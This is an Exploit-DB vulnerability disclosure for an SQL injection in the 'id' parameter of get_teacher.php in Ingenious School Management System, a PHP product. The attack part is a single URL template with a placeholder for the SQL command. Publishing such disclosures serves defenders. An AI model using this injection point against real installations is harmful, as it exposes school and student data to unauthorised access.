Ingenious School Management System - 'id' SQL Injection

EDB-ID:

44770

CVE:

N/A




Platform:

PHP

Date:

2018-05-27


# Exploit Title: Ingenious School Management System - SQL Injection
# Date: 2018-05-26
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce
# Vendor Homepage: https://www.codester.com/items/4945/ingenious-school-management-system
# Version: All Version


Exploit :
http://site.com/model/get_teacher.php?id=-10+[SQL+Command]